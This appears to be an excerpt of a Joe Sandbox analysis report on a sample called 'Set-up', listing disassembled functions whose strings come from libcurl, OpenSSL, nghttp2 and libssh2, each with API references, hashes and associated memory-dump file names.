strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,127.0.0.1,?,?,00000000,00073DA5,?,?,?), ref: 00076267
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,::1,?,?,?,?,00000000,00073DA5,?,?,?), ref: 00076279
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007631C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00073DA5,?,?), ref: 00076329

Strings

localhost, xrefs: 00076250
::1, xrefs: 00076273
127.0.0.1, xrefs: 00076261
Restricted outgoing cookies due to header size, '%s' not sent, xrefs: 00076492
%s%s=%s, xrefs: 00076363
Cookie, xrefs: 000761DD
Cookie: , xrefs: 000762F8, 00076403
%s%s, xrefs: 000763BA

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: %s%s$%s%s=%s$127.0.0.1$::1$Cookie$Cookie: $Restricted outgoing cookies due to header size, '%s' not sent$localhost
API String ID: 3853617425-1910649647
Opcode ID: 6ddc9c0482d49ac9cd6f72e1503e54c81e3fbf0a0a80c13090485bd20141b840
Instruction ID: e54e16737d836e8e355dc672c6e9cc9d225934190fe7d88c5be1651f7556979a
Opcode Fuzzy Hash: 6ddc9c0482d49ac9cd6f72e1503e54c81e3fbf0a0a80c13090485bd20141b840
Instruction Fuzzy Hash: 8371F271E04B016BD7609A209C42B6FBAD6AF91744F08C438FC4E97243EA76DD218796

Function 001D4580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00098C0E,?), ref: 001D45E3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00098C0E,?), ref: 001D460A

Strings

DIR_LOAD, xrefs: 001D466A
/data/curl-i686/lib/engines-3, xrefs: 001D462B, 001D4682
DIR_ADD, xrefs: 001D4683
dynamic, xrefs: 001D4604, 001D4633
id=%s, xrefs: 001D475E
ENGINE_by_id, xrefs: 001D46D5, 001D46FA, 001D4746
OPENSSL_ENGINES, xrefs: 001D461C
LOAD, xrefs: 001D46BA
crypto/engine/eng_list.c, xrefs: 001D46DF, 001D4704, 001D4750
LIST_ADD, xrefs: 001D46A0

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strcmp
String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
API String ID: 1004003707-1524119518
Opcode ID: e0dac7f5ed9e7fc66bc783178c277be66a64eabf582bdc0145de7ed6322e148f
Instruction ID: aa1332af135410a87e577dcaad47183bebd1c69007c5e5893fe3e5c19dd2c7ac
Opcode Fuzzy Hash: e0dac7f5ed9e7fc66bc783178c277be66a64eabf582bdc0145de7ed6322e148f
Instruction Fuzzy Hash: B7419775F80311A7E73437A46C83F2B31995B62B54F4A0126FE56653C3F7A6E91081A3

Function 00086810 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00086884
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 000868AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000868C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00086973
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00086983
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00086995

Strings

[, xrefs: 000869E1

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpystrchr$atoistrlen
String ID: [
API String ID: 444251876-784033777
Opcode ID: 586252b1dd97846bec1e552c4ce3b1f289d5b6c8cc75d6f12a9d46d15e5884ac
Instruction ID: 49ebf934311fcd7776cfad9fb9c02f19d445e787bc12f0ed2132e5ca5fca8467
Opcode Fuzzy Hash: 586252b1dd97846bec1e552c4ce3b1f289d5b6c8cc75d6f12a9d46d15e5884ac
Instruction Fuzzy Hash: 17B149719083915BDB79BA24C8A577FBBD8FF56308F1A052DE8C5C6182EB37C8848752

Function 000263F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00026467

Strings

hsts.c, xrefs: 0002656B, 000265CF
unlimited, xrefs: 000264A1
mite, xrefs: 00026688
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00026462
%s%s "%s", xrefs: 000264AA
%d%02d%02d %02d:%02d:%02d, xrefs: 000266D5
%s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00026540

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: fwrite
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
API String ID: 3559309478-3911685517
Opcode ID: c38b741645a01900783d27e5a3120d2a2576bd8ba452451ff44bf75e20f4461e
Instruction ID: ccedba3bbb32c617fc99852e0c61a79b4c44f52c24dcd5745b57ddd8fd1074ee
Opcode Fuzzy Hash: c38b741645a01900783d27e5a3120d2a2576bd8ba452451ff44bf75e20f4461e
Instruction Fuzzy Hash: ED8107B2A08710ABEB119B24EC41F6B7BE9AF84714F08452CF94987252F732DD55C792

Function 000C6210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0009DB9C,?,000C3BB8,00000000,?,?), ref: 000C6433

Strings

nghttp3_ringbuf_len(chunks), xrefs: 000C64B0
stream->outq_idx + 1 >= npopped, xrefs: 000C642E
chunk->begin == tbuf->buf.begin, xrefs: 000C64C5
nghttp3_stream.c, xrefs: 000C6429, 000C6487, 000C6496, 000C64AB, 000C64C0
stream_pop_outq_entry, xrefs: 000C647D
chunk->end == tbuf->buf.end, xrefs: 000C649B

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
API String ID: 1222420520-1470553442
Opcode ID: a9ae92602960571d3ffa95a62513d697b365b1b0c632c6a0579376a6d7752168
Instruction ID: 49664f7a542d5816972870613a50eb8590fb50d1881e63d58e648502a9acc4e1
Opcode Fuzzy Hash: a9ae92602960571d3ffa95a62513d697b365b1b0c632c6a0579376a6d7752168
Instruction Fuzzy Hash: 32714770604244AFCB69DF64D885FAE77F1BF84700F00852CF84A972A1EB72E950CB56

Function 0003E760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 00045EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00045ED4

Part of subcall function 00064F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00064F9E

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0003EA9B

Part of subcall function 000406F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00045663,?), ref: 000406F9

Strings

HEAD, xrefs: 0003ED9A, 0003EDA2
Switch from POST to GET, xrefs: 0003ED2B
Maximum (%ld) redirects followed, xrefs: 0003EC11
Clear auth, redirects scheme from %s to %s, xrefs: 0003EB84
GET, xrefs: 0003ED95
transfer.c, xrefs: 0003E7F2, 0003E97C, 0003EA7D, 0003EAA5, 0003EAE1, 0003EB46, 0003EB92, 0003EBA8, 0003EBCA, 0003EC43
Issue another request to this URL: '%s', xrefs: 0003ECA4
Switch to %s, xrefs: 0003EDA3
The redirect target URL could not be parsed: %s, xrefs: 0003E9E1
Clear auth, redirects to port from %u to %u, xrefs: 0003EB1B

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$atoistrcpy
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
API String ID: 2444498485-4197959747
Opcode ID: 736b125555ea05b2eb05cc348a073f230ceb63427ceb2aafd0aa71792e89d3ff
Instruction ID: 02fb778e77b79d3ae7e028bd6479867c8897268280968501a995554956d2bb08
Opcode Fuzzy Hash: 736b125555ea05b2eb05cc348a073f230ceb63427ceb2aafd0aa71792e89d3ff
Instruction Fuzzy Hash: C7F11471904380ABEB629F10DC86BEA7BDDAF10304F084675FD49AE2D7E771A9148762

Function 0021A300 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0021A61C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 0021A632

Part of subcall function 0021A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,0021A654,?,PRIVATE KEY), ref: 0021A0BD
Part of subcall function 0021A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0021A0C8
Part of subcall function 0021A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 0021A0DF

Part of subcall function 001938A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0019397E

Strings

pem_read_bio_key_legacy, xrefs: 0021A7F8, 0021A827
PARAMETERS, xrefs: 0021A5CF
PUBLIC KEY, xrefs: 0021A5D4, 0021A5F1
PEM, xrefs: 0021A3FF
ENCRYPTED PRIVATE KEY, xrefs: 0021A62C
ANY PRIVATE KEY, xrefs: 0021A6B4
crypto/pem/pem_pkey.c, xrefs: 0021A555, 0021A802, 0021A831, 0021A85C, 0021A872
PRIVATE KEY, xrefs: 0021A616, 0021A649
pem_read_bio_key_decoder, xrefs: 0021A54E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
API String ID: 3853617425-3686562516
Opcode ID: e08475d14826e0f011119c6cdc09d362f562372bac4cdddad8fe31eb3e1b7aaf
Instruction ID: 66bf081badcd17382f638912aa2f4eea0193fdb9772f226b77971332309beafe
Opcode Fuzzy Hash: e08475d14826e0f011119c6cdc09d362f562372bac4cdddad8fe31eb3e1b7aaf
Instruction Fuzzy Hash: 75D12AB2D153017BE7217A60AC43F6F76D99FB0744F440828FD48A6283FB71E96586A3

Function 0010C290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 0010C60E

Strings

Unable to allocate new SFTP handle structure, xrefs: 0010C646
Failed opening remote file, xrefs: 0010C531
Too small FXP_STATUS, xrefs: 0010C517
Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 0010C410
Unable to send FXP_OPEN*, xrefs: 0010C45B
Too small FXP_HANDLE, xrefs: 0010C582, 0010C675
feWould block waiting for status message, xrefs: 0010C4A6
Timeout waiting for status message, xrefs: 0010C4FB
Response too small, xrefs: 0010C4E3
Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 0010C444

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
API String ID: 3510742995-1499184223
Opcode ID: 6f8a1caf06d2dd059f1408f3b4f18d780bb88492be5e466713a0a626a6d51bfc
Instruction ID: b826da71c6dfff450b76def9b57bd4663b0588cc81901dd0e83fd2bd68fc6efe
Opcode Fuzzy Hash: 6f8a1caf06d2dd059f1408f3b4f18d780bb88492be5e466713a0a626a6d51bfc
Instruction Fuzzy Hash: 72B1E3B0904741ABD714CF28DC85B6BB7A4FF94318F044A2CF4D6962D2E7B1E918CB92

Function 0006C5E0 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 269stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(-00000004), ref: 0006C625

Strings

STOP, xrefs: 0006C9C3
Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 0006C6CA
unsupported MDTM reply format, xrefs: 0006C72D
Skipping time comparison, xrefs: 0006C7D5
The requested document is not new enough, xrefs: 0006C971
MDTM failed: file does not exist or permission problem, continuing, xrefs: 0006C70D
@Y, xrefs: 0006C6A0
The requested document is not old enough, xrefs: 0006C7AA
%04d%02d%02d %02d:%02d:%02d GMT, xrefs: 0006C8BB
[%s] -> [%s], xrefs: 0006C9CF

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %04d%02d%02d %02d:%02d:%02d GMT$@Y$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$MDTM failed: file does not exist or permission problem, continuing$STOP$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$[%s] -> [%s]$unsupported MDTM reply format
API String ID: 39653677-1105712637
Opcode ID: 32f83167604baac7ea57a69ed65ef7c79706730376dd9f35be2f19e4b3620dfe
Instruction ID: 87e39052797dbbceb0a1bf81ba9ccd3baa77962fecca7b8003bfe354fc086c1d
Opcode Fuzzy Hash: 32f83167604baac7ea57a69ed65ef7c79706730376dd9f35be2f19e4b3620dfe
Instruction Fuzzy Hash: DFB117701087855BE721CB34C888FBABBE6AF46308F08452DE8D98B193E735F655CB61

Function 000AA530 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 420COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->state == NGHTTP2_STREAM_IDLE,nghttp2_session.c,00000528,?,?,-00000264,?,00000000,?,00000004,?), ref: 000AA93D
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES),nghttp2_session.c,0000052F,?,?,-00000264,?,00000000,?,00000004,?), ref: 000AA952
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream),nghttp2_session.c,0000052A,?,?,-00000264,?,00000000,?,00000004,?), ref: 000AA967
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,000005B2), ref: 000AA97C

Strings

dep_stream, xrefs: 000AA977
(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream), xrefs: 000AA962
nghttp2_session.c, xrefs: 000AA933, 000AA948, 000AA95D, 000AA972
stream->state == NGHTTP2_STREAM_IDLE, xrefs: 000AA938
!(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES), xrefs: 000AA94D

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

